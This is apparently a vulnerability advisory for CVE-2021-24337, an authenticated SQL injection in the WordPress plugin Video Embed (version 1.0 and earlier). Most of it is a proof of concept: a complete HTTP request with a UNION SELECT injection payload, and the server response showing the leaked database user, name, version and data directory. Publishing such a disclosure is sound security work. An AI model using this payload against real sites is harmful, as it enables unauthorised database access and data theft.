Video Embed <= 1.0 – Authenticated (subscriber+) SQL Injection | CVE 2021-24337

Description

The id GET parameter of one of the plugin's page (available via forced browsing) is not sanitised, validated or escaped before being used in a SQL statement, allowing low privilege users, such as subscribers, to perform SQL injection.

Proof of Concept

Note: The URL /wp-admin/admin.php?page=edit-video-embed&id=1 is not directly in the menu but can be accessed by forced browsing.


GET http://172.28.128.50/wp-admin/admin.php?page=edit-video-embed&id=0+union+select+1%2Ccurrent_user%28%29%2C3%2Cdatabase%28%29%2C%40%40version%2C6%2C@@datadir%3B HTTP/1.1
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [subscriber+]
Host: 172.28.128.50


Response

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Apr 2021 00:25:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: wp-settings-4=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: wp-settings-time-4=1618619143; expires=Sun, 17-Apr-2022 00:25:43 GMT; Max-Age=31536000; path=/

<...... snip ......>
				<form action="" method="post" name="video_embed" style="float: left; width: 100%;" id="video_embed">
			<table>
				<tr>
					<td>Title: </td>
					<td><input type="text" name="title" value="bob@localhost" /></td>
				</tr>
				<tr style="height: 50px;">
					<td>Video from: </td>
					<td>
						<input type="radio" name="video_embed_for"  value="youtube" /> Youtube / Vimeo
						<input type="radio" name="video_embed_for"  value="videosuit" /> VideoSuit
					</td>
				</tr>
				<tr>
					<td>Youtube Embed Url: </td>
					<td>
						<input type="text" name="url" value="wp"/>
												<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
					</td>
				</tr>
				<tr>
					<td>Pdf Path: </td>
					<td><input type="text" name="pdf" value="8.0.23-0ubuntu0.20.04.1" /></td>
					<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
				</tr>
				<tr>
					<td>Audio Path: </td>
					<td><input type="text" name="audio" value="6" /></td>
					<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
				</tr>
				<tr>
					<td>Useful Link: </td>
					<td><textarea name="useful_link">/var/lib/mysql/</textarea></td>
					<td><p style="font-size: 11px;">Please specify your html content</p></td>
				</tr>
				<tr>
					<td><input type="submit" value="Save"/>
					<td><input type="hidden" name="saved" value="1" /></td>
				</tr>
			</table>
		</form>
	</div>

<div class="clear"></div></div><!-- wpbody-content -->

<...... snip ......>